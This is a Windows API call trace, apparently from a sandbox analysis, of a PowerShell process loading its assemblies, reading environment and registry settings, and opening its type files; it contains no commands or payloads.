	[0391.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0392.887] SetConsoleCtrlHandler (HandlerRoutine=0x27568dc, Add=1) returned 1
	[0392.933] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0392.935] CoCreateGuid (in: pguid=0x28df90 | out: pguid=0x28df90*(Data1=0x417d3802, Data2=0x6c2f, Data3=0x4cb0, Data4=([0]=0xa0, [1]=0x33, [2]=0x9c, [3]=0x82, [4]=0xa, [5]=0xa4, [6]=0xb9, [7]=0x6e))) returned 0x0
	[0393.389] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.389] CoTaskMemFree (pv=0x147ca0) 
	[0393.415] WinSqmIsOptedIn () returned 0x0
	[0393.415] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.415] CoTaskMemFree (pv=0x147ca0) 
	[0393.416] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.416] CoTaskMemFree (pv=0x147ca0) 
	[0393.417] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.417] CoTaskMemFree (pv=0x147ca0) 
	[0393.417] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.417] CoTaskMemFree (pv=0x147ca0) 
	[0393.418] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.418] CoTaskMemFree (pv=0x147ca0) 
	[0393.419] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.419] CoTaskMemFree (pv=0x147ca0) 
	[0393.419] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.419] CoTaskMemFree (pv=0x147ca0) 
	[0393.420] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.420] CoTaskMemFree (pv=0x147ca0) 
	[0393.422] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.422] CoTaskMemFree (pv=0x147ca0) 
	[0393.430] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.430] CoTaskMemFree (pv=0x147ca0) 
	[0393.433] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.433] CoTaskMemFree (pv=0x147ca0) 
	[0393.433] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0393.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0393.434] CoTaskMemFree (pv=0x147ca0) 
	[0394.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0394.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0394.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0394.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.442] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0395.442] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0395.443] CoTaskMemFree (pv=0x147ca0) 
	[0395.444] CoTaskMemAlloc (cb=0xcc) returned 0x17de30
	[0395.444] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x17de30, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0395.444] CoTaskMemFree (pv=0x17de30) 
	[0395.444] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x28db08 | out: phkResult=0x28db08*=0x328) returned 0x0
	[0395.444] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28da8c, lpData=0x0, lpcbData=0x28da88*=0x0 | out: lpType=0x28da8c*=0x2, lpData=0x0, lpcbData=0x28da88*=0x6c) returned 0x0
	[0395.444] CoTaskMemAlloc (cb=0x70) returned 0x126430
	[0395.444] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28da5c, lpData=0x126430, lpcbData=0x28da58*=0x6c | out: lpType=0x28da5c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x28da58*=0x6c) returned 0x0
	[0395.444] CoTaskMemFree (pv=0x126430) 
	[0395.444] CoTaskMemAlloc (cb=0xcc) returned 0x17de30
	[0395.444] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x17de30, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0395.444] CoTaskMemFree (pv=0x17de30) 
	[0395.444] CoTaskMemAlloc (cb=0xcc) returned 0x17de30
	[0395.444] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x17de30, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0395.444] CoTaskMemFree (pv=0x17de30) 
	[0395.447] RegCloseKey (hKey=0x328) returned 0x0
	[0395.447] CoTaskMemAlloc (cb=0xcc) returned 0x17de30
	[0395.447] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x17de30, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0395.448] CoTaskMemFree (pv=0x17de30) 
	[0395.448] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x28db08 | out: phkResult=0x28db08*=0x328) returned 0x0
	[0395.448] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28da8c, lpData=0x0, lpcbData=0x28da88*=0x0 | out: lpType=0x28da8c*=0x0, lpData=0x0, lpcbData=0x28da88*=0x0) returned 0x2
	[0395.448] RegCloseKey (hKey=0x328) returned 0x0
	[0395.451] CoTaskMemAlloc (cb=0x20c) returned 0x16e420
	[0395.452] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x16e420 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0395.453] CoTaskMemFree (pv=0x16e420) 
	[0395.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x28d690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0395.454] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0395.760] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0395.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.760] CoTaskMemFree (pv=0x147ca0) 
	[0395.762] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0395.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.762] CoTaskMemFree (pv=0x147ca0) 
	[0395.765] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0395.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.765] CoTaskMemFree (pv=0x147ca0) 
	[0395.765] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0395.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.765] CoTaskMemFree (pv=0x147ca0) 
	[0395.766] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d8f8 | out: phkResult=0x28d8f8*=0x330) returned 0x0
	[0395.767] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x28d90c, lpData=0x0, lpcbData=0x28d908*=0x0 | out: lpType=0x28d90c*=0x1, lpData=0x0, lpcbData=0x28d908*=0x74) returned 0x0
	[0395.768] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x28d87c, lpData=0x0, lpcbData=0x28d878*=0x0 | out: lpType=0x28d87c*=0x1, lpData=0x0, lpcbData=0x28d878*=0x74) returned 0x0
	[0395.768] CoTaskMemAlloc (cb=0x78) returned 0x126430
	[0395.768] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x28d84c, lpData=0x126430, lpcbData=0x28d848*=0x74 | out: lpType=0x28d84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x28d848*=0x74) returned 0x0
	[0395.768] CoTaskMemFree (pv=0x126430) 
	[0395.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x28d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0395.768] SetErrorMode (uMode=0x1) returned 0x1
	[0395.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x28d7d0 | out: lpFileInformation=0x28d7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0395.768] SetErrorMode (uMode=0x1) returned 0x1
	[0395.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0395.771] SetErrorMode (uMode=0x1) returned 0x1
	[0395.771] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7d0 | out: lpFileInformation=0x28d7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0395.771] SetErrorMode (uMode=0x1) returned 0x1
	[0395.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0395.774] SetErrorMode (uMode=0x1) returned 0x1
	[0395.775] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d7d0 | out: lpFileInformation=0x28d7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0395.775] SetErrorMode (uMode=0x1) returned 0x1
	[0395.778] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0395.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.778] CoTaskMemFree (pv=0x147ca0) 
	[0395.785] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0395.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.785] CoTaskMemFree (pv=0x147ca0) 
	[0395.786] GetACP () returned 0x4e4
	[0395.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0395.794] SetErrorMode (uMode=0x1) returned 0x1
	[0395.794] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0395.794] GetFileType (hFile=0x334) returned 0x1
	[0395.794] SetErrorMode (uMode=0x1) returned 0x1
	[0395.794] GetFileType (hFile=0x334) returned 0x1
	[0395.796] ReadFile (in: hFile=0x334, lpBuffer=0x2dec3d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2dec3d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0395.799] ReadFile (in: hFile=0x334, lpBuffer=0x2dec3d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2dec3d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0395.799] ReadFile (in: hFile=0x334, lpBuffer=0x2dec3d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2dec3d8*, lpNumberOfBytesRead=0x28d708*=0x1000, lpOverlapped=0x0) returned 1
	[0395.799] ReadFile (in: hFile=0x334, lpBuffer=0x2dec3d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2dec3d8*, lpNumberOfBytesRead=0x28d708*=0xcf3, lpOverlapped=0x0) returned 1
	[0395.799] ReadFile (in: hFile=0x334, lpBuffer=0x2deb833, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2deb833*, lpNumberOfBytesRead=0x28d708*=0x0, lpOverlapped=0x0) returned 1
	[0395.800] ReadFile (in: hFile=0x334, lpBuffer=0x2dec3d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28d708, lpOverlapped=0x0 | out: lpBuffer=0x2dec3d8*, lpNumberOfBytesRead=0x28d708*=0x0, lpOverlapped=0x0) returned 1
	[0395.801] CloseHandle (hObject=0x334) returned 1
	[0395.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0395.805] SetErrorMode (uMode=0x1) returned 0x1
	[0395.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d680 | out: lpFileInformation=0x28d680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0395.805] SetErrorMode (uMode=0x1) returned 0x1
	[0396.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
